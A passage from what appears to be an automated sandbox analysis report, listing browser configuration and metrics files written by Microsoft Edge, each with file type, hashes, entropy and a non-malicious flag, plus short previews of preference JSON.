                                                                                                                                                                                                                                                                                    SHA-512:5BCADF5B0CEA887BD43BBBEE84CB16A63C470224A82F33EE49F0104EB07A63321FEFB4202BDFAA9C43666FD6DA14143B102FAF8AC239C6537A355DBE14BE2AE5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44710
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.095682108607961
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkB1wuzhDO6vP6OrhR8qLKvFwcGoup1Xl3jVzXr4CCz:z/Ps+wsI7yOEE6L/chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:5E334A31CCDBDC3C8EFB75BEDB26575B
                                                                                                                                                                                                                                                                                    SHA1:E0C6DD26C4927742075167E6FE920210E6B9D261
                                                                                                                                                                                                                                                                                    SHA-256:60479771555DDE8FB238E2435E451640EAA76ED96571E53733352F6AE9978B93
                                                                                                                                                                                                                                                                                    SHA-512:99490F67FC68AE2C61386DF08D024A462F958DCBD15394F7FD14A982CB27B411FB8B5EF31CF8393365E222488519420524B44882DD9E68E3B06A5D0EFD6212B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):44628
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.096513790721801
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBlwuzhDO6vP6OrhRQcp8bc85cGoup1Xl3jVzXr4CW:z/Ps+wsI7ynE06Lqchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:15E3922E8752C84BC997EC973F9B2B87
                                                                                                                                                                                                                                                                                    SHA1:27B22FEC5597F2BC059AAA82BEEACDE0CFB31A0C
                                                                                                                                                                                                                                                                                    SHA-256:7672E393B783071174B675F6F5214BC8034BA97F03E34966D907C35F9B3DC5A5
                                                                                                                                                                                                                                                                                    SHA-512:5BCADF5B0CEA887BD43BBBEE84CB16A63C470224A82F33EE49F0104EB07A63321FEFB4202BDFAA9C43666FD6DA14143B102FAF8AC239C6537A355DBE14BE2AE5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):45822
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.088049074645876
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:mMkbJrT8IeQc5d9FhvuAhDO6vP6OrhR8qLKvFwycfCAoGGoup1Xl3jVzXr4QK:mMk1rT8H19FI6L/FRoGhu3VlXr4d
                                                                                                                                                                                                                                                                                    MD5:D20DCA2F2AA31D2216FB9DA48EC2CC7D
                                                                                                                                                                                                                                                                                    SHA1:44FE74F10B888F36627EBDFCE71FD64F0BA66EE1
                                                                                                                                                                                                                                                                                    SHA-256:F44CCBDE1C045A0B8B5246DDE86837F59640086B85856498C9E6AD9113C7DFB7
                                                                                                                                                                                                                                                                                    SHA-512:07DE4543DD947DE6658613360158AC5CC2B91254EC5F879A21A774027E03172EBA805FAA4A5DF6E2D28350A2E914CF32B56D8C18412F14C0CF78ABB8293DE7BD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090741681997585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEx6Ltbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:A23AFFFB2AD172F8A25DFBB6C88DEBE5
                                                                                                                                                                                                                                                                                    SHA1:1E6011053C61C791E9D7A02A0388E721DE1976C8
                                                                                                                                                                                                                                                                                    SHA-256:5DD06868735CEAB9CD4F0BB65D7B6758B03B186C523E0C97FCE07720846B5433
                                                                                                                                                                                                                                                                                    SHA-512:427E889ED37A9F26B422346AA275D8E735F74EC8F1DB321DCA0B9A8E137F0649284D974B2969C7F47706A49721357EC03CB94C66752A833B943C4990355D87AB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):45899
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08798709171774
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:mMkbJrT8IeQc5z9FhvuAhDO6vP6OrhRQqLKvFwycfCAoGGoup1Xl3jVzXr4QK:mMk1rT8HL9FI6LzFRoGhu3VlXr4d
                                                                                                                                                                                                                                                                                    MD5:50D98BF5C8A418324967CB5AC17FD5D1
                                                                                                                                                                                                                                                                                    SHA1:373FF113938C7C27672ECA149DD2B4C668E8B4C3
                                                                                                                                                                                                                                                                                    SHA-256:791D30B93231C02345F8070524E82C004400F18F4E7685001640375272A9492B
                                                                                                                                                                                                                                                                                    SHA-512:EBEB97D6949E401E6F2A226FFFAEF0B81DCADF13ED6B91162CCA0D2E96ACA144439DBF70ED6D4CC8A503FF3906F1F7B3BC8326CAEFFC0DDDC9BBAEA333B20E4A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                    MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                    SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                    SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                    SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                                                                                    MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                    SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                    SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                    SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.44590958214845594
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:vfdcFqzSJeoXMY466Pkc+RnpvdP3wN8n0SYzqrJayqbg1HF:tcFleq46gkc+FN9n0SYzqrJayqbaH
                                                                                                                                                                                                                                                                                    MD5:1F54533CE555DAE9955CB0BCDEA1190D
                                                                                                                                                                                                                                                                                    SHA1:D0B24212620A82EB5EB19A0F48FDE59E41912CDB
                                                                                                                                                                                                                                                                                    SHA-256:22E16102EAB96D87D0F4EDE2A2958C9855E06DF09667F7BADE4DEEC51390492A
                                                                                                                                                                                                                                                                                    SHA-512:DDDB72A529D24D70BE379365289AED4C62FB68E7B3DCC04348D9D25BBD1AEB8E0A39C115FEB635C87F3AC797128789B7C2AC8E00B947D4CFC96FD81857259D3D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@..................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".luirqm20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........6......
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                                                                                                                                                                    MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                                                                                                                                                                    SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                                                                                                                                                                    SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                                                                                                                                                                    SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9713
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111389311051109
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:stxkdpe+suwsZihUktAm8dbV+FAAQA66WkaFIMY1PZYJ:stxQlsuwfhEbGvQx6WkaTYw
                                                                                                                                                                                                                                                                                    MD5:3A53E70AEE624CE0A5C22B64DBF18739
                                                                                                                                                                                                                                                                                    SHA1:B3CDAF8CB376A4B8A67A1327AEBA3449E77CB8AB
                                                                                                                                                                                                                                                                                    SHA-256:A0E51D00F3DDB126443BB7A0A77CCD4D2290EF40AE48DE60AAE78BA7B67C5B72
                                                                                                                                                                                                                                                                                    SHA-512:9C9FF148A630EFE600B2657A40237B009DE5EC278836BBC187D17E56B55BFCC339B78A7FE6CB03B5AED164D54ECCBEC8F74A14452F6E5477631CAFA811CD9C5F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17511), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17511
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.48771686632875
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:stxPGKSu4lsuwfh+xwFHybGvQwm6WkaTYw:sjOxuowfmvbG454aTYw
                                                                                                                                                                                                                                                                                    MD5:C2D56E6C62C4834DA041D509AD4CB909
                                                                                                                                                                                                                                                                                    SHA1:3FE4F0011AB92CFBAF9EBD5ABB91D8F1B8CAA898
                                                                                                                                                                                                                                                                                    SHA-256:11A562F87BE3F02A0256D6F538AFB50B51C3526E95B3C471C1971A198B42D616
                                                                                                                                                                                                                                                                                    SHA-512:7B550F1E239E6E8F210BE4138A9868E7D2FDC97A9B12F751082E9BB406C18CD31BF9726D4CD7582B2A899FE09DB453A1789354C9F78506FB7F2B166FE812A6E0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40504
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.5617298467447265
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bqOVrn7pLGLhu4WPm4fl78F1+UoAYDCx9Tuqh0VfUC9xbog/OVDBa5qb7rwAXZGL:bqOVrhchu4WPm4fl7u1jauBaAbQAXZGL
                                                                                                                                                                                                                                                                                    MD5:0B1E1DCDA654ADAEF24A988516CCF8C3
                                                                                                                                                                                                                                                                                    SHA1:A1CD455FAED89AB52DF80EB8DDC32A01440DB5AA
                                                                                                                                                                                                                                                                                    SHA-256:F8EC59A7B0A76A76F01F8854BA8A21414A138A5AE75345473CEC237BBFBD507A
                                                                                                                                                                                                                                                                                    SHA-512:2854E87168CC7597357DD4E2BE2781534794D9EC12233683D8F70CCF1A24E69EFA12118FBED7A19A124F54542128730952D6DB407873863C6B9995A413B7FF1A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379407067597279","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379407067597279","location":5,"ma
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17676), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17676
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.484229567163544
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:stxPGKSu4lsuwfh+xwFHybGvQwm6W7laTYw:sjOxuowfmvbG45daTYw
                                                                                                                                                                                                                                                                                    MD5:D262C592A8F792216A40603B298505D1
                                                                                                                                                                                                                                                                                    SHA1:F376203DB52706F18D266FA71D9AB4537C084279
                                                                                                                                                                                                                                                                                    SHA-256:64EC9D1A66EA787E4490B3B4925EB831B8102CBC462CAEDC19095306101089B2
                                                                                                                                                                                                                                                                                    SHA-512:1EDE4F178E1394B6F36D0B99CF7E169D540EFF3078C353545526D2EB27352DFE9A1C5955197AEB608F1D9744378933E5ADAC0A280B06ABD17B2B7314AD905C49
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.568364574025481
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bHYVq4WPm4fs78F1+UoAYDCx9Tuqh0VfUC9xbog/OVY5qQ7rwO66pctuI:bHYVq4WPm4fs7u1jaJAQQOotD
                                                                                                                                                                                                                                                                                    MD5:33DE49756168DACA4034B274C1401326
                                                                                                                                                                                                                                                                                    SHA1:6EB2200F212C83FD2E1E50F38944606BEA5438AF
                                                                                                                                                                                                                                                                                    SHA-256:0FD31E055BCBE9DB953C2561A3235B34E4E41FAC6D5A68248A4569408DF1ED35
                                                                                                                                                                                                                                                                                    SHA-512:84546116AD508CD382713263AFB6E6AC98F916462042FB35C87748FA99360D1DDCF439635621424B2D9B98F332AF324B6947065D41FF26A14F1944E4AADA73DF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379407067597279","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379407067597279","location":5,"ma
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
